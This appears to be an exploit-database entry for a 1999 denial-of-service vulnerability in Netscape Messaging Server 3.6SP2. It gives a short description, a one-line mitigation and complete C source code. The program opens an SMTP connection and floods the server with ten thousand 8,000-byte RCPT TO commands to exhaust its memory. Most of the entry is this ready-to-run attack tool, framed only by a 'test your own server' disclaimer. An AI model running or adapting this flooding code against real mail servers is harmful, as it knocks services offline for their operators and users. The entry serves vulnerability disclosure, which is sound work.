Netscape Messaging Server Denial of Service Vulnerability

vendor:

Messaging Server

by:

Nobuo Miwa

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Messaging Server

Affected Version From: Netscape Messaging Server 3.6SP2

Affected Version To: Netscape Messaging Server 3.6SP2

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

1999

Netscape Messaging Server Denial of Service Vulnerability

Netscape Messaging server will not de-allocate memory that is used to store the RCPT TO information for an incoming email. By sending enough long RCPT TO addresses, the system can be forced to consume all available memory, leading to a denial of service.

Mitigation:

Limit the number of RCPT TO addresses that can be sent to the server.

Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/748/info

Netscape Messaging server will not de-allocate memory that is used to store the RCPT TO information for an incoming email. By sending enough long RCPT TO addresses, the system can be forced to consume all available memory, leading to a denial of service. 

/***************************************************************
 You can test "YOUR" Netscape Messaging Server 3.6SP2 for NT
 whether vulnerable for too much RCPT TO or not. 
                  by Nobuo Miwa, LAC Japan  28th Oct. 1999 
                  http://www.lac.co.jp/security/ 
****************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define    STR_HELO      "HELO rcpt2\n"
#define    STR_MAILFROM  "MAIL FROM:rcpt2\n"
#define    RCPT2_LENGTH  8000
#define    RCPT2_NUMBER  10000

int openSocket(struct sockaddr_in *si, char *hostIPaddr)
{
    int             port=25, sd, rt ;
    long            li ;
    struct hostent  *he;

    si->sin_addr.s_addr = inet_addr(hostIPaddr);
    si->sin_family      = AF_INET;
    si->sin_port        = htons (port);
    sd = socket (si->sin_family, SOCK_STREAM, 0);
    if (sd == -1) return (-1);

    rt = connect(sd,(struct sockaddr *)si,sizeof(struct sockaddr_in));
    if ( rt < 0 ) {
       close(sd);
       return(-1);
    }

    return(sd) ;
}

void sendRCPT2(int sd)
{
    char    rcptStr[RCPT2_LENGTH], tmpStr[RCPT2_LENGTH+80], strn[80];
    int     rt, i;

    memset( tmpStr, 0, sizeof(tmpStr) ) ;
    recv( sd, tmpStr, sizeof(tmpStr), 0 );
    printf("%s",tmpStr);  

    printf("%s",STR_HELO);
    send( sd, STR_HELO, strlen(STR_HELO), 0 );
    memset( tmpStr, 0, sizeof(tmpStr) ) ;
    rt = recv( sd, tmpStr, sizeof(tmpStr), 0 );
    if ( rt>0 ) printf("%s",tmpStr);

    printf("%s",STR_MAILFROM);
    send(sd, STR_MAILFROM, strlen(STR_MAILFROM), 0);
    memset( tmpStr, 0, sizeof(tmpStr) ) ;
    rt = recv(sd, tmpStr, sizeof(tmpStr), 0);
    if ( rt>0 ) printf("%s",tmpStr);

    strcpy( rcptStr, "RCPT TO: rcpt2@" ) ;
    while ( RCPT2_LENGTH-strlen(rcptStr)>10 )
        strcat( rcptStr, "aaaaaaaaaa") ;
    strcat( rcptStr, "\n" );
    for ( i=0 ; i<RCPT2_NUMBER ; i++ ) {
        printf("No.%d RCPT TO:rcpt2@aaa.. len %d\n",i,strlen(rcptStr));
        send( sd, rcptStr, strlen(rcptStr), 0 );
        rt = recv( sd, tmpStr, sizeof(tmpStr)-1, 0 );
        strncpy( strn, tmpStr, 60 ) ;
        if ( rt>0 ) printf("%s \n",strn);
    }

    return;
}

int main (int argc, char *argv[])
{
    char                 hostIPaddr[80], *cc, *pfft;
    int                  sd = 0;
    struct sockaddr_in   si;

    printf("You can use ONLY for YOUR Messaging Server 3.6\n");
    if (argc != 2) {
        printf("Usage: %s IPaddress \n",argv[0]);
        exit(1);
    } else
        strcpy (hostIPaddr, argv[1]);

    sd = openSocket(&si,hostIPaddr);  

    if (sd < 1) {
        printf("failed!\n");
        exit(-1);
    }

    sendRCPT2( sd );
    close (sd);

    exit(0);
}